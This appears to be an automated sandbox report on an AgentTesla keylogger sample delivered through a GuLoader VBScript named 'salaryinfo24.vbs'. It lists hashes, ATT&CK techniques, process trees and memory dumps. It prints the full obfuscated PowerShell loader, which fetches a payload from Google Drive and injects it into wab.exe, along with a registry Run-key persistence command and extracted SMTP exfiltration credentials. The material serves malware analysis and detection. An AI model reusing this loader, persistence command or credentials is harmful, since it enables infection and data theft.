agenttesla | 9f20ac2fe0041feeda59946899fe0ae20d0d74de009990023102a7d902065324

General

Target

salaryinfo24.vbs
Size

167KB
MD5

41bd6059396fdb7e5fd6692c003b58a0
SHA1

9da6c16a501a619e44652bf1eb3eea3012835f53
SHA256

9f20ac2fe0041feeda59946899fe0ae20d0d74de009990023102a7d902065324
SHA512

a79a1770e4aeefe5a72cc3478cd5fc59c9cfa85b9de644aef1e00c4971b065269c2f68e07223b3115695e88a0c798132fc2c8a52a6af4f0f44679ca5339ba119
SSDEEP

3072:UpK6/PeadLaz+kxSzn9Lj7rZeqGbHfNcckB+HGuG5Elx7d5czQON8Dh20PWgn:UpKyPeadLaz+k0zn1j7rZeqGbHfNcckk

Score

10^/10

agenttesla guloader downloader keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.myhydropowered.com
Port:
587
Username:
abacus@myhydropowered.com
Password:
0nVaQweHLu8RyVL
Email To:
heavywealth@myhydropowered.com

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

3 2212 WScript.exe

flow	pid	process
3	2212	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exewab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Unbilleted% -w 1 $pseudoexperimental=(Get-ItemProperty -Path 'HKCU:\\Mulches\\').Udskrivningsskemaer;%Unbilleted% ($pseudoexperimental)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\FTSKIaM = "C:\\Users\\Admin\\AppData\\Roaming\\FTSKIaM\\FTSKIaM.exe"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
13 drive.google.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 api.ipify.org
20 api.ipify.org
21 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

764 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2492 powershell.exe
764 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2492 set thread context of 764 2492 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2200 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2424 powershell.exe
2492 powershell.exe
764 wab.exe
764 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2492 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2424 powershell.exe
Token: SeDebugPrivilege 2492 powershell.exe
Token: SeDebugPrivilege 764 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

764 wab.exe

flow	ioc
6	drive.google.com
7	drive.google.com
13	drive.google.com

flow	ioc
19	api.ipify.org
20	api.ipify.org
21	ip-api.com

pid	process
764	wab.exe

pid	process
2492	powershell.exe
764	wab.exe

description	pid	process	target process
PID 2492 set thread context of 764	2492	powershell.exe	wab.exe

pid	process
2200	reg.exe

pid	process
2424	powershell.exe
2492	powershell.exe
764	wab.exe
764	wab.exe

pid	process
2492	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	764	wab.exe

pid	process
764	wab.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2212 wrote to memory of 2424	2212	WScript.exe	powershell.exe
PID 2212 wrote to memory of 2424	2212	WScript.exe	powershell.exe
PID 2212 wrote to memory of 2424	2212	WScript.exe	powershell.exe
PID 2424 wrote to memory of 2492	2424	powershell.exe	powershell.exe
PID 2424 wrote to memory of 2492	2424	powershell.exe	powershell.exe
PID 2424 wrote to memory of 2492	2424	powershell.exe	powershell.exe
PID 2424 wrote to memory of 2492	2424	powershell.exe	powershell.exe
PID 2492 wrote to memory of 764	2492	powershell.exe	wab.exe
PID 2492 wrote to memory of 764	2492	powershell.exe	wab.exe
PID 2492 wrote to memory of 764	2492	powershell.exe	wab.exe
PID 2492 wrote to memory of 764	2492	powershell.exe	wab.exe
PID 2492 wrote to memory of 764	2492	powershell.exe	wab.exe
PID 2492 wrote to memory of 764	2492	powershell.exe	wab.exe
PID 764 wrote to memory of 2128	764	wab.exe	cmd.exe
PID 764 wrote to memory of 2128	764	wab.exe	cmd.exe
PID 764 wrote to memory of 2128	764	wab.exe	cmd.exe
PID 764 wrote to memory of 2128	764	wab.exe	cmd.exe
PID 2128 wrote to memory of 2200	2128	cmd.exe	reg.exe
PID 2128 wrote to memory of 2200	2128	cmd.exe	reg.exe
PID 2128 wrote to memory of 2200	2128	cmd.exe	reg.exe
PID 2128 wrote to memory of 2200	2128	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\salaryinfo24.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Utilgngeligheds;++$Utilgngeligheds;$Utilgngeligheds=$Utilgngeligheds-1;Function Metrologue ($Reprsentantskabsmder116){$klr=5;$klr++;For($Tidsmangler=5; $Tidsmangler -lt $Reprsentantskabsmder116.Length-1; $Tidsmangler+=$klr){$Defoamers = 'substring';$Hemophthalmia=$Reprsentantskabsmder116.$Defoamers.Invoke($Tidsmangler, 1);$Translinguate=$Translinguate+$Hemophthalmia}$Translinguate;}$Ditetikker=Metrologue 'Stregh Fol t ConctHovedp F rds Velf: ,her/konce/Lus.ndAfslrr Skmmi nchavParoteL,jev.For,ygskfteoOpsamoAgentg.ompolCallgeIndic.Fil,ece.envo.ctinmEnigm/K vituF.lescCivil? JueceSin,uxChildpDefi.o epetrPodettQu dr=Extrad.mrkeo KordwIchulnVa kbl O.kloZe,inaEternd Ver & Hyp,iSeismdtresi=Udjvn1IndbeXUnhid_Conne_Propy8 PardNcirklqDenatLAk ivQAnebiNSubsilFr trHDetalAHitle_h nvi4Lynchctwofo9SkglaRFal,km D,ciXUns,ekDogma6pr,pyzFlejnUE,heroNo.dl_.nworvVersigSchoouKikrtlFejleQ squ.7Indety .rug ';$Planeta=$Ditetikker.split([char]62);$Ditetikker=$Planeta[0];$Socialmedicinen=Metrologue 'CrossiBe.ameStartxFrper ';$See = Metrologue ' Rets\TrentsNidify FedtsHi.towGemmeo fr.pwNonna6 Plou4Inexp\RigelW digiiTwinenBypladFe,choS,rtswSr,etsKalvePspirooDadarwP raleVaricrTinw S Abm,hBoligeCosyelQuinilFatti\ S mlvUdvik1Aaben. ,ndi0ansta\Pettip panooSt,klwGormaeSkelerunplas udfohNonreeEnganlGe frlSynth..ropiePunctxIng neH nde ';&($Socialmedicinen) (Metrologue 'Marga$Triphspl.nleArbejkYernssForstu TurnaBaerelska.mfCasewoTermor So ibBaan r S eay lasdNarcoeF.nallSn kksTram,e KrisnModehs Stru=imbur$StemneCymo,nUnempvfinm :Ar ejwScramiGrandn b,ysdFwgriiAwatsrMu.ed ') ;&($Socialmedicinen) (Metrologue ' sti,$SociaSTidebeFors,e Dish=Otosk$Ar,ussStolpeNonlokPresosKno suMgli,a ,onglImmatfJubilo Lok rFacadb KapirMa.esy Prs,dKi,seeDatallVindisNonreeSvalenLammesTw fa+arbej$ nuseSTilsieWand e Scol ') ;&($Socialmedicinen) (Metrologue 'Gusta$proinK AqueoAn.ngmMon.rp TidseS,iedtSerumee.dogn EmphcSandse UnmarSvennsSmara .once= Vel. ,rnen(t,mpe(forskgm riawArsenmGa triMutes Forplw hati Ind nYardg3Galej2 Moll_LividpRiv.rr Capro Try.c st teOmstrsBa kss Inf, Piaro-KongeFEenty M.dstPIntror.ouffoBe ogcSkomaetjenesPrecosLesatIChiasdTegne= Teah$Feltr{VelstPOps.nIAr.epDForsk}Enact)Gonfa. .ogiCJussioProvimUdklam LeafaLastvnForbudBarseL B weiRemisndetereD.tan)Eig t .mel- endisSikkepAnt,glEpitsiHardwtRi ik Undfa[Afkrac Az.xhTiptiaTetrarterm.]Myome3Sladd4G.nok ');&($Socialmedicinen) (Metrologue 'Radil$S,mekAK,gnitErigetForere.esidnSto.at,riboi U,troPro.pn.dekosUnpre Husp.=Uddan Indek$ IsthKBegrdoaldremfe thpSeroge ErsttPiglieCoachnLancicVanr,ecrepyrBreatsAn el[ Blge$To.peKTri,uoPele,mTilvrpSarceeTelegtTaph e ag,pnContrcLo.sseUrethr ,eolsCowga. BrdmcBesmuoFuldtuElkernPul.otSailf-Nyska2 Show] Bedu ');&($Socialmedicinen) (Metrologue '.kubo$ TidsM,earbiAkklim Dem mHikkeo Fla o App dFadmo= r.gs( IndtT So ieLettisOverltKrust-G,vstPExtinaKure tFor,rhUnder ,ncy$UdpnsS Trylefav.peKitog)Lede, Dross-viscoAExcepnEkspodLsbod C tha(Sagin[ Ru.eIStat.nSkab.t Bum.PElneatUngkarToxap]K ind: Obdu:Rett sinhumi NitazHuleke Subt ands-Mo,aseBedraqShei, ontr8 Wa,e)Downw ') ;if ($Mimmood) {.$See $Attentions;} else {;$Frihedsbervelserne=Metrologue 'TomboS.lloftSchooaGiganr urwtZagua-CurviBTantriRegartKystlsSeapiTtri.arC.lsiaCerutnMountsugunsffemkae ForkrSpoil Sekre-,nneaSBiviaoBacchuretinr PaabchieroeTilba Mist$ usenDklarlitilsmtko.teeFunnitVal fiOrobakPuckekNeighe MinirDesse phym-pilg.DVersaeC.selsGush tG,nasij.stindokuma.dtalt thori GramoFlossnVishn Eup,$Arbejs,dloseNymfok Ku,asPedeluUnd.raFor.klOpk.mfPycnooS otsrWoolsbHypotrSlatcyDiscadEscoreTilbal.gerksTronfeUnpranappensKoor ';&($Socialmedicinen) (Metrologue 'Orr.o$FallesS adseAbscikBu,easRecliu Bru a.amselSociafT,ksto Sextr SamabcontrrFrigiyMillidRdby,eTomlelDistas ucusePeronnN.ttesSvrge=F.rie$ClunkeCrewinsketcv jert: ToetaSist p orfgpResiddBorgea FisstBejdsa Idep ') ;&($Socialmedicinen) (Metrologue 'Met,zImacr,m KaffpForm oBlo mr Sydat Till- hjemMUnperoDecatdAutomutelevl kontebeslu LovbrBMa.jai,rivitbap.isTjrehTdeterrPube.aEjendnDeskrsad,rdfT angeVerr r,hary ') ;$seksualforbrydelsens=$seksualforbrydelsens+'\Socialbegivenhed.Mis';while (-not $Reaccess) {&($Socialmedicinen) (Metrologue 'Pausa$dis aR DolieOmnira V,dic RebacUdfakeInhumsRespusDisho=,rund( MennT AftreOuttasSavagt Relu-.ysnoPOversa AswitSkydehOmsti F.lla$UnpitsSkrideSvendkRkenssAn aruFinlnaSchumlReprifAlvisoRetsprAfprobindanrAnt,ky Copad,ilmse nderlTagalsBlinde ApplnRetrosUndig)Feuda ') ;&($Socialmedicinen) $Frihedsbervelserne;&($Socialmedicinen) (Metrologue 'KraveStokentatheraArch,r .midtVokab-Ch cqSEm yrlDroskeStatueAnisyp Offe A.gus5Fo re ');$Ditetikker=$Planeta[$Djibouti++%$Planeta.count];}&($Socialmedicinen) (Metrologue ' Afm,$GlebeW Per.iInflun RestdToluioSkrudwS.rdaeNogendAssor8Un,he4Fe.do Risot= Para KolonGCureleSuprat Ove,- Pan C bstoBttennudplatRattoeHiccunRaphatBolig Lo.om$Bo,frs LadkeCi ilkamtets Eneru,evyea Fi,elGelatfRoucooBobnirHul ibXenomr EskayGetupdStorme rythl Gi,ssRestaeSt.nunHakkesAnfrs ');&($Socialmedicinen) (Metrologue 'E,tra$UnflanB,aase Angip .eniaRadiolGifteepromisWeig,iJo.udsTindekS,der D,spe=Moons Hedge[korfiSEarwiyFemkmsplagitWagnae ShremGipni.Oste,CThreaoT,ermnDimetvWe.tneAchi r,epott Ce l] Redo:Whigg:Mo uaFNonrerRe.reo,kattmOntolBHvssea Fl msTrvleeFdrel6S,ste4Suga SArsmet Ifrer.tilniCunctnUn,ergUdson(Skole$ StofW Ultri wettnSte bdLynbroProgrwUglereBal.adUnund8Appel4dipo,)Myelo ');&($Socialmedicinen) (Metrologue 'Repet$ca.baKBifroa,rusnn neumj BehoaAr,ors Pun, egn= .sen Vi ks[Rom.nSCystey TyvesEupadt.evineSirenmHairs.FichuTPlysseOphrfxMat,ot C,ic.EndopEKo frnFu ktcklatgoSystedSvingiM,kronBrolgg Lorn]Maled: Bimb:Deli AS,minSBlankC.ilkeITrachISkrif.LykkeGUnatte Nynatl.yerSS mtytM strrTekstiEnevrnFjerng ival(P,ano$KvatonKomp,eMisfopFors a Undel Forse.apabspyeliiTele.sUnshakKabin)Ti,lg ');&($Socialmedicinen) (Metrologue 'Thimb$ForgaR InteeSo,rbk CarrtStandiThermfAtt.iimu,kecFontie Fem.rDen,giPhycon HoopgDedukeLoqfonConci=Staph$Pa,goKove faUddepnStilej ,rowa FisksMenne.ElefssRockyuPlectbPe,nisTerritsteeprNonhoiHand.n RedugCocco(Paami3 Fab 1Styli9Nonsy3Vokse1Dis,r0busko,Tro.h2,pilo4 Cest0Gumbo2 ring4Jocoq)Sackm ');&($Socialmedicinen) $Rektificeringen;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2424

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Utilgngeligheds;++$Utilgngeligheds;$Utilgngeligheds=$Utilgngeligheds-1;Function Metrologue ($Reprsentantskabsmder116){$klr=5;$klr++;For($Tidsmangler=5; $Tidsmangler -lt $Reprsentantskabsmder116.Length-1; $Tidsmangler+=$klr){$Defoamers = 'substring';$Hemophthalmia=$Reprsentantskabsmder116.$Defoamers.Invoke($Tidsmangler, 1);$Translinguate=$Translinguate+$Hemophthalmia}$Translinguate;}$Ditetikker=Metrologue 'Stregh Fol t ConctHovedp F rds Velf: ,her/konce/Lus.ndAfslrr Skmmi nchavParoteL,jev.For,ygskfteoOpsamoAgentg.ompolCallgeIndic.Fil,ece.envo.ctinmEnigm/K vituF.lescCivil? JueceSin,uxChildpDefi.o epetrPodettQu dr=Extrad.mrkeo KordwIchulnVa kbl O.kloZe,inaEternd Ver & Hyp,iSeismdtresi=Udjvn1IndbeXUnhid_Conne_Propy8 PardNcirklqDenatLAk ivQAnebiNSubsilFr trHDetalAHitle_h nvi4Lynchctwofo9SkglaRFal,km D,ciXUns,ekDogma6pr,pyzFlejnUE,heroNo.dl_.nworvVersigSchoouKikrtlFejleQ squ.7Indety .rug ';$Planeta=$Ditetikker.split([char]62);$Ditetikker=$Planeta[0];$Socialmedicinen=Metrologue 'CrossiBe.ameStartxFrper ';$See = Metrologue ' Rets\TrentsNidify FedtsHi.towGemmeo fr.pwNonna6 Plou4Inexp\RigelW digiiTwinenBypladFe,choS,rtswSr,etsKalvePspirooDadarwP raleVaricrTinw S Abm,hBoligeCosyelQuinilFatti\ S mlvUdvik1Aaben. ,ndi0ansta\Pettip panooSt,klwGormaeSkelerunplas udfohNonreeEnganlGe frlSynth..ropiePunctxIng neH nde ';&($Socialmedicinen) (Metrologue 'Marga$Triphspl.nleArbejkYernssForstu TurnaBaerelska.mfCasewoTermor So ibBaan r S eay lasdNarcoeF.nallSn kksTram,e KrisnModehs Stru=imbur$StemneCymo,nUnempvfinm :Ar ejwScramiGrandn b,ysdFwgriiAwatsrMu.ed ') ;&($Socialmedicinen) (Metrologue ' sti,$SociaSTidebeFors,e Dish=Otosk$Ar,ussStolpeNonlokPresosKno suMgli,a ,onglImmatfJubilo Lok rFacadb KapirMa.esy Prs,dKi,seeDatallVindisNonreeSvalenLammesTw fa+arbej$ nuseSTilsieWand e Scol ') ;&($Socialmedicinen) (Metrologue 'Gusta$proinK AqueoAn.ngmMon.rp TidseS,iedtSerumee.dogn EmphcSandse UnmarSvennsSmara .once= Vel. ,rnen(t,mpe(forskgm riawArsenmGa triMutes Forplw hati Ind nYardg3Galej2 Moll_LividpRiv.rr Capro Try.c st teOmstrsBa kss Inf, Piaro-KongeFEenty M.dstPIntror.ouffoBe ogcSkomaetjenesPrecosLesatIChiasdTegne= Teah$Feltr{VelstPOps.nIAr.epDForsk}Enact)Gonfa. .ogiCJussioProvimUdklam LeafaLastvnForbudBarseL B weiRemisndetereD.tan)Eig t .mel- endisSikkepAnt,glEpitsiHardwtRi ik Undfa[Afkrac Az.xhTiptiaTetrarterm.]Myome3Sladd4G.nok ');&($Socialmedicinen) (Metrologue 'Radil$S,mekAK,gnitErigetForere.esidnSto.at,riboi U,troPro.pn.dekosUnpre Husp.=Uddan Indek$ IsthKBegrdoaldremfe thpSeroge ErsttPiglieCoachnLancicVanr,ecrepyrBreatsAn el[ Blge$To.peKTri,uoPele,mTilvrpSarceeTelegtTaph e ag,pnContrcLo.sseUrethr ,eolsCowga. BrdmcBesmuoFuldtuElkernPul.otSailf-Nyska2 Show] Bedu ');&($Socialmedicinen) (Metrologue '.kubo$ TidsM,earbiAkklim Dem mHikkeo Fla o App dFadmo= r.gs( IndtT So ieLettisOverltKrust-G,vstPExtinaKure tFor,rhUnder ,ncy$UdpnsS Trylefav.peKitog)Lede, Dross-viscoAExcepnEkspodLsbod C tha(Sagin[ Ru.eIStat.nSkab.t Bum.PElneatUngkarToxap]K ind: Obdu:Rett sinhumi NitazHuleke Subt ands-Mo,aseBedraqShei, ontr8 Wa,e)Downw ') ;if ($Mimmood) {.$See $Attentions;} else {;$Frihedsbervelserne=Metrologue 'TomboS.lloftSchooaGiganr urwtZagua-CurviBTantriRegartKystlsSeapiTtri.arC.lsiaCerutnMountsugunsffemkae ForkrSpoil Sekre-,nneaSBiviaoBacchuretinr PaabchieroeTilba Mist$ usenDklarlitilsmtko.teeFunnitVal fiOrobakPuckekNeighe MinirDesse phym-pilg.DVersaeC.selsGush tG,nasij.stindokuma.dtalt thori GramoFlossnVishn Eup,$Arbejs,dloseNymfok Ku,asPedeluUnd.raFor.klOpk.mfPycnooS otsrWoolsbHypotrSlatcyDiscadEscoreTilbal.gerksTronfeUnpranappensKoor ';&($Socialmedicinen) (Metrologue 'Orr.o$FallesS adseAbscikBu,easRecliu Bru a.amselSociafT,ksto Sextr SamabcontrrFrigiyMillidRdby,eTomlelDistas ucusePeronnN.ttesSvrge=F.rie$ClunkeCrewinsketcv jert: ToetaSist p orfgpResiddBorgea FisstBejdsa Idep ') ;&($Socialmedicinen) (Metrologue 'Met,zImacr,m KaffpForm oBlo mr Sydat Till- hjemMUnperoDecatdAutomutelevl kontebeslu LovbrBMa.jai,rivitbap.isTjrehTdeterrPube.aEjendnDeskrsad,rdfT angeVerr r,hary ') ;$seksualforbrydelsens=$seksualforbrydelsens+'\Socialbegivenhed.Mis';while (-not $Reaccess) {&($Socialmedicinen) (Metrologue 'Pausa$dis aR DolieOmnira V,dic RebacUdfakeInhumsRespusDisho=,rund( MennT AftreOuttasSavagt Relu-.ysnoPOversa AswitSkydehOmsti F.lla$UnpitsSkrideSvendkRkenssAn aruFinlnaSchumlReprifAlvisoRetsprAfprobindanrAnt,ky Copad,ilmse nderlTagalsBlinde ApplnRetrosUndig)Feuda ') ;&($Socialmedicinen) $Frihedsbervelserne;&($Socialmedicinen) (Metrologue 'KraveStokentatheraArch,r .midtVokab-Ch cqSEm yrlDroskeStatueAnisyp Offe A.gus5Fo re ');$Ditetikker=$Planeta[$Djibouti++%$Planeta.count];}&($Socialmedicinen) (Metrologue ' Afm,$GlebeW Per.iInflun RestdToluioSkrudwS.rdaeNogendAssor8Un,he4Fe.do Risot= Para KolonGCureleSuprat Ove,- Pan C bstoBttennudplatRattoeHiccunRaphatBolig Lo.om$Bo,frs LadkeCi ilkamtets Eneru,evyea Fi,elGelatfRoucooBobnirHul ibXenomr EskayGetupdStorme rythl Gi,ssRestaeSt.nunHakkesAnfrs ');&($Socialmedicinen) (Metrologue 'E,tra$UnflanB,aase Angip .eniaRadiolGifteepromisWeig,iJo.udsTindekS,der D,spe=Moons Hedge[korfiSEarwiyFemkmsplagitWagnae ShremGipni.Oste,CThreaoT,ermnDimetvWe.tneAchi r,epott Ce l] Redo:Whigg:Mo uaFNonrerRe.reo,kattmOntolBHvssea Fl msTrvleeFdrel6S,ste4Suga SArsmet Ifrer.tilniCunctnUn,ergUdson(Skole$ StofW Ultri wettnSte bdLynbroProgrwUglereBal.adUnund8Appel4dipo,)Myelo ');&($Socialmedicinen) (Metrologue 'Repet$ca.baKBifroa,rusnn neumj BehoaAr,ors Pun, egn= .sen Vi ks[Rom.nSCystey TyvesEupadt.evineSirenmHairs.FichuTPlysseOphrfxMat,ot C,ic.EndopEKo frnFu ktcklatgoSystedSvingiM,kronBrolgg Lorn]Maled: Bimb:Deli AS,minSBlankC.ilkeITrachISkrif.LykkeGUnatte Nynatl.yerSS mtytM strrTekstiEnevrnFjerng ival(P,ano$KvatonKomp,eMisfopFors a Undel Forse.apabspyeliiTele.sUnshakKabin)Ti,lg ');&($Socialmedicinen) (Metrologue 'Thimb$ForgaR InteeSo,rbk CarrtStandiThermfAtt.iimu,kecFontie Fem.rDen,giPhycon HoopgDedukeLoqfonConci=Staph$Pa,goKove faUddepnStilej ,rowa FisksMenne.ElefssRockyuPlectbPe,nisTerritsteeprNonhoiHand.n RedugCocco(Paami3 Fab 1Styli9Nonsy3Vokse1Dis,r0busko,Tro.h2,pilo4 Cest0Gumbo2 ring4Jocoq)Sackm ');&($Socialmedicinen) $Rektificeringen;}"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2492

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:764

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Unbilleted% -w 1 $pseudoexperimental=(Get-ItemProperty -Path 'HKCU:\Mulches\').Udskrivningsskemaer;%Unbilleted% ($pseudoexperimental)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Unbilleted% -w 1 $pseudoexperimental=(Get-ItemProperty -Path 'HKCU:\Mulches\').Udskrivningsskemaer;%Unbilleted% ($pseudoexperimental)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2200

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
41b8a71a607759374b7c184851627c03

SHA1
49042b848855648e2bbbea6c7513bac657a26b02

SHA256
0310441d296c71103bfe94d278aea9694aea87b2ad9e890f840ed22e61bffff3

SHA512
c542e04521ca45bceeb0fe3b01ae217fd9b4e5c11c6eac05dfc4de5e93bd931fc805be415edcf7c770d193bd8a0fe2ca88c639312e0042abd22904e1e1d2da5e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
1a85ccb451efcbc96cbf25c71eb21d6e

SHA1
6e38bf588502fff9ec2c19ea612aa2e7282b6fe5

SHA256
33a38fb342f6a31e65efd886eb4cfdb750e60b73447b4b354f620c8a08d4bf25

SHA512
500c6bc1a1489fafc4df27624ab7c05de783f6ca66a4a163c68bc15f1f8df8c7228f8f0a107ec1fbd5740485f1e5e4d5a4947cecbd6344fbdba45f2495e12876

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8FB2.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5B89.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FUK4EN7DYJBJ686SXEZ1.temp
Filesize
7KB

MD5
d54467c56fa2c5e3910567a3aee82cb1

SHA1
3fdf3aece0df0b46896f599dcffc2079427e331a

SHA256
a2fdeb4726c755a238a196ce38a5cfb078946110f5e6960cc69ab6906df01de1

SHA512
f8d7b20a4f06e4d91eb90b7fdc0d02d1eaa80ec72b214bb98723ab775ec64483eee363cd012b221183deb49fdc453fa37a7ecae1b64b8700032c6f7820c89fb3

Download Submit
memory/764-93-0x000000006F360000-0x000000006FA4E000-memory.dmp

Filesize
6.9MB

Download
memory/764-95-0x00000000223D0000-0x0000000022410000-memory.dmp

Filesize
256KB

Download
memory/764-62-0x00000000778E0000-0x0000000077A89000-memory.dmp

Filesize
1.7MB

Download
memory/764-103-0x00000000223D0000-0x0000000022410000-memory.dmp

Filesize
256KB

Download
memory/764-102-0x000000006F360000-0x000000006FA4E000-memory.dmp

Filesize
6.9MB

Download
memory/764-97-0x00000000778E0000-0x0000000077A89000-memory.dmp

Filesize
1.7MB

Download
memory/764-63-0x0000000077B06000-0x0000000077B07000-memory.dmp

Filesize
4KB

Download
memory/764-60-0x0000000001EB0000-0x00000000044C4000-memory.dmp

Filesize
38.1MB

Download
memory/764-87-0x0000000000E40000-0x0000000001EA2000-memory.dmp

Filesize
16.4MB

Download
memory/764-90-0x0000000001EB0000-0x00000000044C4000-memory.dmp

Filesize
38.1MB

Download
memory/764-91-0x0000000000E40000-0x0000000000E82000-memory.dmp

Filesize
264KB

Download
memory/764-64-0x0000000077AD0000-0x0000000077BA6000-memory.dmp

Filesize
856KB

Download
memory/2424-25-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp

Filesize
9.6MB

Download
memory/2424-49-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2424-48-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2424-94-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp

Filesize
9.6MB

Download
memory/2424-47-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2424-46-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2424-45-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp

Filesize
9.6MB

Download
memory/2424-24-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2424-23-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp

Filesize
9.6MB

Download
memory/2424-22-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/2424-27-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2424-21-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/2424-26-0x0000000002990000-0x0000000002A10000-memory.dmp

Filesize
512KB

Download
memory/2492-33-0x0000000073920000-0x0000000073ECB000-memory.dmp

Filesize
5.7MB

Download
memory/2492-61-0x0000000006470000-0x0000000008A84000-memory.dmp

Filesize
38.1MB

Download
